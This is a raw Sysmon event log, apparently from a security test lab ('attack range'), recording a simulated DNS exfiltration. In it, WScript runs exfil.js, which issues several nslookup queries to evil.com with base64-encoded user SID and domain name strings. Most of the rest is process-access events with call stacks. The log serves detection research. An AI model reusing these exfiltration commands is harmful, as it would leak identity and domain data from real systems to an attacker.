14:21:56.273{2E1864BB-1904-629A-E846-000000005F02}59363796C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E746-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E846-000000005F02}5936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E746-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-18E0-629A-6742-000000005F02}39767368C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-E746-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.262{2E1864BB-1904-629A-E746-000000005F02}312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguchax.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.257{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljah.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-1904-629A-E546-000000005F02}10284212C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E646-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.226{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E646-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.210{2E1864BB-1904-629A-E446-000000005F02}12405488C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-E646-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.225{2E1864BB-1904-629A-E646-000000005F02}5824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-E446-000000005F02}1240C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljah.tmp 2>&1 10341000x8000000000000000217057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.204{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E546-000000005F02}1028C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.188{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-E546-000000005F02}1028C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.188{2E1864BB-1904-629A-E546-000000005F02}10284212C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E446-000000005F02}1240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E546-000000005F02}1028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E446-000000005F02}1240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.172{2E1864BB-18E0-629A-6742-000000005F02}39764552C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-E446-000000005F02}1240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.175{2E1864BB-1904-629A-E446-000000005F02}1240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljah.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.157{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgvhs.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-1904-629A-E246-000000005F02}48365136C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-E346-000000005F02}8128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 